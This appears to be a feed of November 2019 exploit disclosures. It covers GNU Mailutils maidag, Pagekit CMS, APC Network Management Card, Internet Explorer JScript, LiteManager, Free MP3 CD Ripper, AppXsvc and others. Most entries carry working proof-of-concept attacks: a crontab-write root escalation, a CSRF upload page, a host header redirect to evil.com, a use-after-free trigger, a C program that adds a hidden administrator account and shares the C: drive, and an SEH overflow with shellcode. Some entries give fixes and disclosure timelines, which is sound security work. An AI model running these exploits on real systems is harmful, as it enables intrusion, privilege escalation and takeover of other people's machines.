November 21, 2019, 7:20 am
GNU Mailutils versions 2.0 through 3.7 suffer from a local privilege escalation vulnerability.
MD5 | 3cd7ca09d51964b1583d6172f508e129# Exploit Title: GNU Mailutils 3.7 - Local Privilege Escalation
# Date: 2019-11-06
# Exploit Author: Mike Gualtieri
# Vendor Homepage: https://mailutils.org/
# Software Link: https://ftp.gnu.org/gnu/mailutils/mailutils-3.7.tar.gz
# Version: 2.0 <= 3.7
# Tested on: Gentoo
# CVE : CVE-2019-18862
Title : GNU Mailutils / Maidag Local Privilege Escalation
Author : Mike Gualtieri :: https://www.mike-gualtieri.com
Date : 2019-11-06
Updated : 2019-11-20
Vendor Affected: GNU Mailutils :: https://mailutils.org/
Versions Affected: 2.0 - 3.7
CVE Designator: CVE-2019-18862
1. Overview
The --url parameter included in the GNU Mailutils maidag utility (versions 2.0
through 3.7) can abused to write to arbitrary files on the host operating
system. By default, maidag is set to execute with setuid root permissions,
which can lead to local privilege escalation through code/command execution by
writing to the system's crontab or by writing to other root owned files on the
operating system.
2. Detail
As described by the project's homepage, "GNU Mailutils is a swiss army knife of
electronic mail handling. It offers a rich set of utilities and daemons for
processing e-mail".
Maidag, a mail delivery agent utility included in the suite, is by default
marked to execute with setuid (suid) root permissions.
The --url parameter of maidag can be abused to write to arbitrary files on the
operating system. Abusing this option while the binary is marked with suid
permissions allows a low privileged user to write to arbitrary files on the
system as root. Writing to the crontab, for example, may lead to a root shell.
The flaw itself appears to date back to the 2008-10-19 commit, when the --url
parameter was introduced to maidag.
11637b0f - New maidag mode: --url
https://git.savannah.gnu.org/cgit/mailutils.git/commit/?id=11637b0f262db62b4dc466cefb9315098a1a995a
maidag/Makefile.am:
chmod 4755 $(DESTDIR)$(sbindir)/$$i;\
The following payload will execute arbitrary commands as root and works with
versions of maidag, through version 3.7.
maidag --url /etc/crontab < /tmp/crontab.in
The file /tmp/crontab.in would contain a payload like the following.
line 1:
line 2: */1 * * * * root /tmp/payload.sh
Please note: For the input to be accepted by maidag, the first line of the
file must be blank or be commented.
In the above example, the file /tmp/payload.sh would include arbitrary
commands to execute as root.
Older versions of GNU Mailutils (2.2 and previous) require a different syntax:
maidag --url 'mbox://user@localhost //etc/crontab'< /tmp/crontab.in
3. Solution
A fix for the flaw has been made in GNU Mailutils 3.8, which removes the maidag
utility, and includes three new utilities that replace its functionality.
Details about the new features can be found in the project's release notes:
https://git.savannah.gnu.org/cgit/mailutils.git/tree/NEWS
Another workaround for those unable to upgrade, is to remove the suid bit on
/usr/sbin/maidag (e.g. `chmod u-s /usr/sbin/maidag`).
It should be noted that some Linux distributions already remove the suid bit
from maidag by default, nullifying this privilege escalation flaw.
Another patch has been made available by Sergey Poznyakoff and posted to the
GNU Mailutils mailing list, which removes the setuid bit for maidag in all but
required cases. The patch is intended for users who can not yet upgrade to
mailutils 3.8. The patch has also been made available here:
https://www.mike-gualtieri.com/files/maidag-dropsetuid.patch
4. Additional Comments
This vulnerability disclosure was submitted to MITRE Corporation for inclusion
in the Common Vulnerabilities and Exposures (CVE) database. The designator
CVE-2019-18862 has been assigned.
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-18862
https://nvd.nist.gov/vuln/detail/CVE-2019-18862
The NIST National Vulnerability Database (NVD) has assigned the following
ratings:
CVSS 3.x Severity and Metrics: Base Score: 7.8 HIGH
CVSS 2.0 Severity and Metrics: Base Score: 4.6 MEDIUM
This disclosure will be updated as new information becomes available.
5. History
2019-10-09 Informed Sergey Poznyakoff <gray@gnu.org.ua> of security issue
2019-10-10 Reply from Sergey acknowledging the issue
2019-10-12 Fix available in the GNU Mailutils git repository:
739c6ee5 - Split maidag into three single-purpose tools
https://git.savannah.gnu.org/cgit/mailutils.git/commit/?id=739c6ee525a4f7bb76b8fe2bd75e81a122764ced
2019-11-06 GNU Mailutils Version 3.8 released to close the issue
2019-11-06 Submission of this vulnerability disclosure to MITRE Corporate to
obtain a CVE designator
2019-11-07 Patch offered by Sergey for those unable to upgrade to version 3.8
2019-11-11 CVE-2019-18862 assigned to flaw
2019-11-20 Vulnerability disclosure made publicly available
↧
November 21, 2019, 7:20 am
Pagekit CMS version 1.0.17 suffers from a cross site request forgery vulnerability.
MD5 | 46229d9ac3cd2137bc8f46cfaabb010dTitle:
====
Pagekit CMS 1.0.17 Cross-Site Request Forgery (CSRF) vulnerability
Credit:
======
Name: Christian Bortone
CVE:
====
CVE-2019-19013
Date:
====
11/18/2019 (dd/mm/yyyy)
Vendor:
======
Pagekit is a modern and lightweight open source CMS.
Vendor link: https://pagekit.com/
Vulnerable Product:
==============
Pagekit CMS 1.0.17
Abstract:
=======
Cross-Site Request Forgery (CSRF) vulnerability in Pagekit 1.0.17 could allow an attacker to upload arbitrary file by removing the CSRF token from the request.
Exploitation-Technique:
===================
Remote
Severity Rating (CVSS):
===================
4.6 (Medium) (CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N)
Details:
=======
A Cross-Site Request Forgery (CSRF) vulnerability is discovered in Pagekit CMS which allows a remote attacker to upload forged files on the server without victim's knowledge by enticing authenticated user to visit attacker page/URL. The specific flaw exists within the handling of request to upload file in the store section. The application failed to validate CSRF token on the POST request (the token can be remove from the request). The request also contain a second token (WebkitFormBoudary) not tied to the session user. An attacker with less privilege on the system can operate a CRSF attack
Vulnerable module/page/application: /site/storage (upload file)
PoC Exploit code:
----------------------------------------------------------------------------
<html>
<body>
<script>history.pushState('', '', '/')</script>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "http:\/\/localhost\/pagekit\/system\/finder\/upload", true);
xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=----WebKitFormBoundaryJze564AoGkbRRRUz");
xhr.setRequestHeader("Accept", "*\/*");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.9");
xhr.withCredentials = true;
var body = "------WebKitFormBoundaryJze564AoGkbRRRUz\r\n" +
"Content-Disposition: form-data; name=\"files[]\"; filename=\"test.jpg\"\r\n" +
"Content-Type: image/jpeg\r\n" +
"\r\n" +
"\r\n" +
"------WebKitFormBoundaryJze564AoGkbRRRUz\r\n" +
"Content-Disposition: form-data; name=\"path\"\r\n" +
"\r\n" +
"/\r\n" +
"------WebKitFormBoundaryJze564AoGkbRRRUz\r\n" +
"Content-Disposition: form-data; name=\"root\"\r\n" +
"\r\n" +
"storage\r\n" +
"------WebKitFormBoundaryJze564AoGkbRRRUz\r\n" +
"Content-Disposition: form-data; name=\"_csrf\"\r\n" +
"\r\n" +
"\r\n" +
"------WebKitFormBoundaryJze564AoGkbRRRUz--\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
submitRequest();
</script>
<form action="#">
<input type="button" value="Submit request" onclick="submitRequest();" />
</form>
</body>
</html>
----------------------------------------------------------------------------
↧
↧
November 21, 2019, 7:21 am
Network Management Card version 6.2.0 suffers from a host header injection vulnerability.
MD5 | 3a2ad46f90883b9f9f684a3ed51ff8a8# Exploit Title: Network Management Card 6.2.0 - Host Header Injection
# Google Dork:
# Date: 2019-11-21
# Exploit Author: Amal E Thamban,Kamal Paul
# Vendor Homepage: https://www.apc.com/in/en/
# Software Link: https://www.apc.com/shop/in/en/products/Network-Management-Card
# Version: v6.2.0
# Tested on: Kali Linux
# CVE :
Description:Host Header Injection
Product is vulnerable to host header injection because the host header can be changed to something outside the target domain (ie.evil.com) and cause it to redirect to to that domain instead.
-------------------------------------------------------------------------------------------------------------------------
Orginal Request
GET / HTTP/1.1
Host: 192.168.10.211
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.10.211/logon.htm
Connection: close
Cookie: C0=apc
Upgrade-Insecure-Requests: 1
--------------------------------------------------------------------------------------------------------------------------
Modifed request
GET / HTTP/1.1
Host: evil.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.10.211/logon.htm
Connection: close
Cookie: C0=apc
Upgrade-Insecure-Requests:
---------------------------------------------------------------------------------------------------------------------------
Response
HTTP/1.1 303 See Other
Location: http://evil.com/home.htm
Content-Length: 0
WebServer:
Connection: close
↧
November 21, 2019, 2:11 pm
macOS suffers from an update_dyld_shared_cache privilege escalation vulnerability.
MD5 | ccb563e2e8325980cd5cfa90ec74c416
↧
November 21, 2019, 2:11 pm
Microsoft Internet Explorer suffers from a use-after-free vulnerability in Script arguments during toJSON callback.
MD5 | 9b1e32c7d5ecc6ef6b2e7b6e987d25b5IE: Use-after-free in JScript arguments during toJSON callback
There is a use-after-free issue in JSCript (triggerable via Internet Explorer) where the members of the 'arguments' object aren't tracked by the garbage collector during the 'toJSON' callback. Thus, during the 'toJSON' callback, it is possible to assign a variable to the 'arguments' object, have it garbage-collected (as long as it is not referenced anywhere else) and still access it later. Note that, like in some previously reported JSCript issues, this is a use-after-free on a JSCript variable (VAR structure), so in order to trigger a crash, the entire block of variables must be freed.
PoC for Internet Explorer is below. I tested it on multiple Windows version with the latest security patches applied.
===========================================================
<!-- saved from url=(0014)about:internet -->
<meta http-equiv=\"X-UA-Compatible\" content=\"IE=8\"></meta>
<script language=\"Jscript.Encode\">
var spray = new Array();
function F() {
alert('callback');
// 2. Create a bunch of objects
for (var i = 0; i < 20000; i++) spray[i] = new Object();
// 3. Store a reference to one of them in the arguments array
// The arguments array isn't tracked by garbage collector
arguments[0] = spray[5000];
// 4. Delete the objects and call the garbage collector
// All JSCript variables get reclaimed...
for (var i = 0; i < 20000; i++) spray[i] = 1;
CollectGarbage();
// 5. But we still have reference to one of them in the
// arguments array
alert(arguments[0]);
}
// 1. Cause toJSON callback to fire
var o = {toJSON:F}
JSON.stringify(o);
alert('done');
</script>
===========================================================
Debug log:
===========================================================
(1cf4.154): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000080 ebx=05ecc218 ecx=00000080 edx=00000001 esi=05f0c3c8 edi=05fb12e8
eip=6e25f52a esp=05ecc180 ebp=05ecc1b4 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
jscript!PrepareInvoke+0x12a:
6e25f52a 0fb707 movzx eax,word ptr [edi] ds:002b:05fb12e8=????
0:009> k
# ChildEBP RetAddr
00 05ecc1b4 6e262b75 jscript!PrepareInvoke+0x12a
01 05ecc2a8 6e2660ee jscript!VAR::InvokeByDispID+0x1c5
02 05ecc4a0 6e26244a jscript!CScriptRuntime::Run+0x2e4e
03 05ecc594 6e2622a1 jscript!ScrFncObj::CallWithFrameOnStack+0xaa
04 05ecc5ec 6e25bec9 jscript!ScrFncObj::Call+0x81
05 05ecc68c 6e262aed jscript!NameTbl::InvokeInternal+0x399
06 05ecc78c 6e2a862c jscript!VAR::InvokeByDispID+0x13d
07 05ecc800 6e2a8c2e jscript!GCProtectKeyAndCall+0xed
08 05ecc898 6e2a93ce jscript!JSONApplyFilters+0x125
09 05ecc90c 6e2ad9a2 jscript!JSONStringifyObject+0xac
0a 05ecc9b4 6e269e3a jscript!JsJSONStringify+0x382
0b 05ecca1c 6e25bec9 jscript!NatFncObj::Call+0xea
0c 05eccabc 6e25e476 jscript!NameTbl::InvokeInternal+0x399
0d 05eccc78 6e262aa5 jscript!VAR::InvokeByName+0x8f6
0e 05eccd70 6e2660ee jscript!VAR::InvokeByDispID+0xf5
0f 05eccf68 6e26244a jscript!CScriptRuntime::Run+0x2e4e
10 05ecd05c 6e2622a1 jscript!ScrFncObj::CallWithFrameOnStack+0xaa
11 05ecd0b4 6e257124 jscript!ScrFncObj::Call+0x81
12 05ecd170 6e257f75 jscript!CSession::Execute+0x314
13 05ecd1d0 6e256c83 jscript!COleScript::ExecutePendingScripts+0x2d5
14 05ecd274 6e2569b9 jscript!COleScript::ParseScriptTextCore+0x2c3
15 05ecd2a0 70209251 jscript!COleScript::ParseScriptText+0x29
16 05ecd2d8 70122a27 MSHTML!CActiveScriptHolder::ParseScriptText+0x51
17 05ecd348 70121fe2 MSHTML!CScriptCollection::ParseScriptText+0x182
18 05ecd434 701226ee MSHTML!CScriptData::CommitCode+0x312
19 05ecd4b0 7012153a MSHTML!CScriptData::Execute+0x1ba
1a 05ecd4d0 701e99b6 MSHTML!CHtmScriptParseCtx::Execute+0xaa
1b 05ecd524 70159c7d MSHTML!CHtmParseBase::Execute+0x186
1c 05ecd544 70159599 MSHTML!CHtmPost::Broadcast+0xfd
1d 05ecd66c 7017647d MSHTML!CHtmPost::Exec+0x339
1e 05ecd68c 70176376 MSHTML!CHtmPost::Run+0x3d
1f 05ecd6ac 70176308 MSHTML!PostManExecute+0x60
20 05ecd6c0 70176279 MSHTML!PostManResume+0x6f
21 05ecd6f0 70208447 MSHTML!CHtmPost::OnDwnChanCallback+0x39
22 05ecd708 7015be1d MSHTML!CDwnChan::OnMethodCall+0x27
23 05ecd780 702f1207 MSHTML!GlobalWndOnMethodCall+0x1bd
24 05ecd7d0 7015c5a2 MSHTML!GlobalWndProc_SEH+0x317
25 05ecd7ec 7562624b MSHTML!GlobalWndProc+0x52
26 05ecd818 756174dc USER32!_InternalCallWinProc+0x2b
27 05ecd8fc 7561661b USER32!UserCallWinProcCheckWow+0x3ac
28 05ecd970 756163f0 USER32!DispatchMessageWorker+0x21b
29 05ecd97c 717e6456 USER32!DispatchMessageW+0x10
2a 05ecfb0c 717e73e3 IEFRAME!CTabWindow::_TabWindowThreadProc+0xa36
2b 05ecfbcc 7223df6c IEFRAME!LCIETab_ThreadProc+0x403
2c 05ecfbe4 7130289d msIso!_IsoThreadProc_WrapperToReleaseScope+0x1c
2d 05ecfc1c 75520419 IEShims!NS_CreateThread::AutomationIE_ThreadProc+0x8d
2e 05ecfc2c 7789662d KERNEL32!BaseThreadInitThunk+0x19
2f 05ecfc88 778965fd ntdll!__RtlUserThreadStart+0x2f
30 05ecfc98 00000000 ntdll!_RtlUserThreadStart+0x1b
===========================================================
This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available (whichever is earlier), the bug
report will become visible to the public.
Related CVE Numbers: CVE-2019-1429.
Found by: ifratric@google.com
↧
↧
November 22, 2019, 7:46 am
ProShow Producer version 9.0.3797 suffers from an unquoted service path vulnerability.
MD5 | a4fc1181b21d3e5e515a569bbda70f74#Exploit Title: ProShow Producer 9.0.3797 - ('ScsiAccess') Unquoted Service Path
#Exploit Author : ZwX
#Exploit Date: 2019-11-21
#Vendor Homepage : http://www.photodex.com/
#Link Software : http://files.photodex.com/release/pspro_90_3797.exe
#Tested on OS: Windows 7
#Analyze PoC :
==============
C:\Users\ZwX>sc qc ScsiAccess
[SC] QueryServiceConfig réussite(s)
SERVICE_NAME: ScsiAccess
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\Photodex\ProShow Producer\ScsiAccess.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : ScsiAccess
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
↧
November 22, 2019, 7:47 am
LiteManager version 4.5.0 suffers from an insecure file permission vulnerability.
MD5 | 45e9e64e6c97b86f690aef2d4b2f9485# Exploit Title: LiteManager 4.5.0 - Insecure File Permissions
# Exploit Author: ZwX
# Exploit Date: 2019-11-21
# Vendor Homepage : LiteManager Team
# Software Link: http://html.tucows.com/preview/1594042/LiteManager-Free?q=remote+support
# Tested on OS: Windows 7
# Proof of Concept (PoC):
==========================
C:\Program Files\LiteManagerFree - Server>icacls *.exe
ROMFUSClient.exe Everyone:(F)
AUTORITE NT\Système:(I)(F)
BUILTIN\Administrateurs:(I)(F)
BUILTIN\Utilisateurs:(I)(RX)
#Exploit code(s):
=================
1) Compile below 'C' code name it as "ROMFUSClient.exe"
#include<windows.h>
int main(void){
system("net user hacker abc123 /add");
system("net localgroup Administrators hacker /add");
system("net share SHARE_NAME=c:\ /grant:hacker,full");
WinExec("C:\\Program Files\\LiteManagerFree\\~ROMFUSClient.exe",0);
return 0;
}
2) Rename original "ROMFUSClient.exe" to "~ROMFUSClient.exe"
3) Place our malicious "ROMFUSClient.exe" in the LiteManagerFree directory
4) Disconnect and wait for a more privileged user to connect and use ROMFUSClient IDE.
Privilege Successful Escalation
↧
November 24, 2019, 12:53 pm
Free MP3 CD Ripper version 2.8 suffers from a buffer overflow vulnerability that can trigger a denial of service condition.
MD5 | 7327fd046eaecae3084c3ca6500dd375#Exploit Title : Free MP3 CD Ripper 2.8 Buffer Overflow (DOS)
#Date: 23-08-2019
#Vulnerable Software: FREE MP3 CD RIPPER 2.8 Build 20140611
#Vendor Home Page: www.cleanersoft.com/
#Software Link: www.cleanersoft.com/cd_ripper/free_cd_ripper.html
#Tested On: Windows 7 (64Bit)
#Attack Type : Denial of Service
#Impact : Code Execution
#Tested Version - 2.8
#Author - Malav Vyas
#Twitter - @malav_vyas1
#Contact - malavvyas98@gmail.com
"""
Steps to reproduce
[1] Run this python file and generate exploit.wav file
[2] Open Free Mp3 CD ripper on target and click on convert button
[3] select exploit.wav file
[4] w00t!! Application should crash, resulting in Denial of service
"""
#!/usr/bin/python
buffer = "A" * 6000
payload = buffer
try:
f=open("exploit.wav","w")
print "[+] Creating %s bytes evil payload.." %len(payload)
f.write(payload)
f.close()
print "[+] File created!"
except:
print "File cannot be created"
↧
November 24, 2019, 12:54 pm
Free MP3 CD Ripper version 2.8 suffers from a buffer overflow vulnerability.
MD5 | 5bac126cac6647e4c92b409087d833b7#Exploit Title: Free MP3 CD Ripper 2.8 - '.mp3' Structured Exception Handler Buffer Overflow
# '.mp3 file'
# Author" Malav Vyas
# Tweeter @malav_vyas1
#Tested on Windows xp SP3 English
#Tested Version - 2.8 build 20140611
#Steps:
#Run the script it will generate exploit.mp3 file.
#Run Free MP3 CD Ripper 2.8 on windows xp sp3
# Click on Convert - and open "exploit.mp3"
# A calculator will pop up
#!/usr/bin/python
buffer = "A" * 4116
NSEH = "\xeb\x06\x90\x90"
SEH = "\x21\x21\xe4\x66"
nops = "\x90" * 8
#badchar \x00\x0a\x0d\x2f
#calculator
buf = ""
buf += "\xba\x9a\x98\xaf\x7e\xdd\xc2\xd9\x74\x24\xf4\x5f\x29"
buf += "\xc9\xb1\x31\x83\xc7\x04\x31\x57\x0f\x03\x57\x95\x7a"
buf += "\x5a\x82\x41\xf8\xa5\x7b\x91\x9d\x2c\x9e\xa0\x9d\x4b"
buf += "\xea\x92\x2d\x1f\xbe\x1e\xc5\x4d\x2b\x95\xab\x59\x5c"
buf += "\x1e\x01\xbc\x53\x9f\x3a\xfc\xf2\x23\x41\xd1\xd4\x1a"
buf += "\x8a\x24\x14\x5b\xf7\xc5\x44\x34\x73\x7b\x79\x31\xc9"
buf += "\x40\xf2\x09\xdf\xc0\xe7\xd9\xde\xe1\xb9\x52\xb9\x21"
buf += "\x3b\xb7\xb1\x6b\x23\xd4\xfc\x22\xd8\x2e\x8a\xb4\x08"
buf += "\x7f\x73\x1a\x75\xb0\x86\x62\xb1\x76\x79\x11\xcb\x85"
buf += "\x04\x22\x08\xf4\xd2\xa7\x8b\x5e\x90\x10\x70\x5f\x75"
buf += "\xc6\xf3\x53\x32\x8c\x5c\x77\xc5\x41\xd7\x83\x4e\x64"
buf += "\x38\x02\x14\x43\x9c\x4f\xce\xea\x85\x35\xa1\x13\xd5"
buf += "\x96\x1e\xb6\x9d\x3a\x4a\xcb\xff\x50\x8d\x59\x7a\x16"
buf += "\x8d\x61\x85\x06\xe6\x50\x0e\xc9\x71\x6d\xc5\xae\x8e"
buf += "\x27\x44\x86\x06\xee\x1c\x9b\x4a\x11\xcb\xdf\x72\x92"
buf += "\xfe\x9f\x80\x8a\x8a\x9a\xcd\x0c\x66\xd6\x5e\xf9\x88"
buf += "\x45\x5e\x28\xeb\x08\xcc\xb0\xc2\xaf\x74\x52\x1b"
pad = "B" * (4440 - len(NSEH) - len(SEH) - len(buffer) - len(nops) - len(buf) )
payload = buffer + NSEH + SEH + nops + buf + pad
try:
f=open("exploit.mp3","w")
print "[+] Creating %s bytes evil payload.." %len(payload)
f.write(payload)
f.close()
print "[+] File created!"
except:
print "File cannot be created"
↧
↧
November 24, 2019, 12:55 pm
Whitepaper called Remote File Inclusion / Local File Inclusion Attack and Defense Techniques. This paper focuses on PHP-based attacks.
MD5 | 34f21e6ac1aa7a3653bb417dc20e8aaf
↧
November 26, 2019, 9:24 am
Microsoft Windows AppXsvc deployment extension suffers from a privilege escalation vulnerability.
MD5 | 6491894f34aeaeb814791df0ccc185a4# Exploit Title: Microsoft Windows AppXsvc Deployment Extension - Privilege Escalation
# Date: 2019-11-22
# Exploit Author: Abdelhamid Naceri
# Vendor Homepage: www.microsoft.com
# Tested on: Windows 10 1903
# CVE : CVE-2019-1385
Windows: "AppX Deployment Service" (AppXSVC) elevation of privilege vulnerability
Class: Local Elevation of Privileges
Description:
This Poc is exploiting a vulnerability in (AppXSvc) , abusing this vulnerability
could allow an attacker to overwrite\create file as SYSTEM which can result in EOP .
The're is 2 way to abuse the issue .
Step To Reproduce :
[1] For An Arbitrary File Creation
1-Turn %userprofile%\AppData\Local\Microsoft\WindowsApps\Backup Into a Junction To
your target directory example "c:\"
2-Open Powershell and execute the command Add-AppxPackage -RegisterByFamilyName -ForceApplicationShutdown -MainPackage Microsoft.MicrosoftEdge_8wekyb3d8bbwe
3-Check the directory the file should be created now
4-Enjoy:)
[2] To Overwrite File
1-Create a temp dir in %temp%\
2-Create a hardlink to your target file in the temp created dir
3-Turn %userprofile%\AppData\Local\Microsoft\WindowsApps\Backup Into a junction to
your temp created dir
4-Open Powershell and execute the command Add-AppxPackage -RegisterByFamilyName -ForceApplicationShutdown -MainPackage Microsoft.MicrosoftEdge_8wekyb3d8bbwe
5-Check the file again
Limitation :
when 'MicrosoftEdge.exe' is created it would inherit the directory permission which
mean the file wouldnt be writtable in majority of cases but a simple example of
abusement in the directory "c:\"<- the default acl is preventing Athenticated Users
from creating file but not modifying them so if we abused the vulnerability in "c:\"
we will have an arbitrary file created and also writeable from a normal user .
also you cant overwrite file that are not writable by SYSTEM , i didnt make a check
in the poc because in if the file is non readable by the current user the check will
return false even if the file is writtable by SYSTEM . NOTE : you can also overwrite
file which you cant even read them .
In the file creation make sure the path is writtable by SYSTEM otherwise the poc will
fail . I think 99% of folders are writtable by SYSTEM
Platform:
This has been tested on a fully patched system (latest patch -> November 2019) :
OS Edition: Microsoft Windows 10 Home
Os Version: 1903
OS Version Info: 18362.418
Additional Info
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\BuldLabEx = 18362.1.amd64fre.19h1_release.190318-1202
Expected result:
The Deployment Process should fail with "ERROR_ACCESS_IS_DENIED"
Observed result :
The Deployment Process is overwritting or creating an arbitrary file as
"LOCAL SYSTEM"
NOTE : It was patched on 7/11/19
↧
November 26, 2019, 9:26 am
Easy-Hide-IP version 5.0.0.3 suffers from an EasyRedirect unquoted service path vulnerability.
MD5 | ead9531a29759a937a984144199f3806# Exploit Title: Easy-Hide-IP 5.0.0.3 - 'EasyRedirect' Unquoted Service Path
# Date: 2019-11-22
# Exploit Author: Rene Cortes S
# Vendor Homepage: https://easy-hide-ip.com
# Software Link: https://easy-hide-ip.com
# Version: 5.0.0.3
# Tested on: Windows 7 Professional Service Pack 1
##########################################################################################################################
Step to discover the unquoted Service:
C:\Users\user>wmic service get name, displayname, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
EasyRedirect EasyRedirect C:\Program Files\Easy-Hide-IP\rdr\EasyRedirect.exe Auto
##############################################################################################################################################
Service info:
C:\Users\user>sc qc EasyRedirect
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: EasyRedirect
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files\Easy-Hide-IP\rdr\EasyRedirect.exe
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : EasyRedirect
DEPENDENCIAS : RPCSS
NOMBRE_INICIO_SERVICIO: LocalSystem
#########################################################################################################################
↧
November 26, 2019, 9:26 am
SMPlayer version 19.5.0 suffers from a denial of service vulnerability.
MD5 | eed61cf4d482a8606b80548507b8cfd6# Title : SMPlayer 19.5.0 - Denial of Service (PoC)
# Tested on : Windows 7 (64 bit)
# Vulnerable Software: SMPlayer v 19.5.0
# Exploit Author: Malav Vyas
# Vendor Homepage: https://smplayer.info
# Version : 19.5.0
# Software Link : https://smplayer.info/en/downloads
# POC
# run this python file, which will generate attack.m3u file
# .m3u file is used as a playlist
# this python file will generate a .m3u file with 25000 "A" characters.
# Open this file in SMPlayer two times.
# second time, buffer would be successfully overflowed and it would result in a Denial Of Service attack.
# For more details, please refer to video
f="attack.m3u"
bof = "A"*25000
writeFile = open(f, "w")
writeFile.write(bof)
writeFile.close()
↧
↧
November 26, 2019, 9:27 am
InTouch Machine Edition version 8.1 SP1 denial of service proof of concept exploit.
MD5 | e557240fd076d97a5c76cc55eb0fda35# Exploit Title: InTouch Machine Edition 8.1 SP1 - 'Atributos' Denial of Service (PoC)
# Discovery by: chuyreds
# Discovery Date: 12019-11-16
# Vendor Homepage: https://on.wonderware.com/
# Software Link : https://on.wonderware.com/intouch-machine-edition
# Tested Version: 8.1 SP1
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 10 Pro x64 es
# InTouch Machine Edition 8.1 SP1.py
# Steps to Produce the Local Buffer Overflow (SEH Unicode):
# 1.- Run python code: InTouch_Machine_Edition_8.1.py
# 2.- Open InTouch_Machine_Edition_8.1.txt and copy content to clipboard
# 3.- Open ITME v8.1 InTouch Machine Edition
# 4.- On Graficos slect Atributos
# 5.- Paste ClipBoard on "No Redibujar"/"Deshabilitados" and click on "Aceptar"
#!/usr/bin/env python
buffer = "\x41" * 1026
f = open ("InTouch_Machine_Edition_8.1.txt", "w")
f.write(buffer)
f.close()
↧
November 26, 2019, 9:28 am
Waves MaxxAudio Drivers version 1.1.6.0 suffers from an unquoted service path vulnerability.
MD5 | 9da05fdfc69efee7cc4ac5f888eb7a91# Exploit Title: Waves MaxxAudio Drivers 1.1.6.0 - 'WavesSysSvc64' Unquoted Service Path
# Discovery by: Luis Martinez
# Discovery Date: 2019-11-24
# Vendor Homepage: https://www.dell.com/
# Software Link : https://www.dell.com/support/home/mx/es/mxbsdt1/drivers/driversdetails?driverid=vwpkk
# Tested Version: 1.1.6.0
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 Pro x64 es
# Step to discover Unquoted Service Path:
C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "Audio" | findstr /i /v """
Waves Audio Services WavesSysSvc C:\Program Files\Waves\MaxxAudio\WavesSysSvc64.exe Auto
# Service info:
C:\>sc qc WavesSysSvc
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: WavesSysSvc
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\Waves\MaxxAudio\WavesSysSvc64.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Waves Audio Services
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
#Exploit:
A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
↧
November 26, 2019, 9:40 am
InduSoft Web Studio version 8.1 SP1 suffers from a denial of service vulnerability.
MD5 | e9f1d17f28667e30360417690582e950# Exploit Title: InduSoft Web Studio 8.1 SP1 - "Atributos" Denial of Service (PoC)
# Discovery by: chuyreds
# Discovery Date: 2019-11-23
# Vendor Homepage: http://www.indusoft.com/
# Software Link : http://www.indusoft.com/Products-Downloads
# Tested Version: 8.1 SP1
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 10 Pro x64 es
# Exploit Title: InduSoft Web Studio 8.1 SP1 - "Atributos"'No Redibujar'/'Deshabilitados' Denial of Service (PoC)
# Discovery by: chuyreds
# Google Dork: chuyrojas1997@gmail.com: chuyreds
# Discovery Date: 23-11-2019
# Vendor Homepage: http://www.indusoft.com/
# Software Link : http://www.indusoft.com/Products-Downloads
# Tested Version: 8.1 SP1
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 10 Pro x64 es
# Steps to Produce the Denial of Service:
# 1.- Run python code: InduSoft Web Studio Edition 8.1 SP1.py
# 2.- Open InduSoft "Web Studio Edition 8.1 SP1.txt" and copy content to clipboard
# 3.- Open InduSoft Web Studio Edition 8.1 SP1
# 4.- On Graficos slect Atributos
# 5.- Paste ClipBoard on "No Redibujar"/"Deshabilitados" and click on "Aceptar"
#!/usr/bin/env python
buffer = "\x41" * 1026
f = open ("InduSoft Web Studio Edition 8.1 SP1.txt", "w")
f.write(buffer)
f.close()
↧
November 26, 2019, 9:41 am
iNetTools for iOS version 8.20 suffers from a denial of service vulnerability.
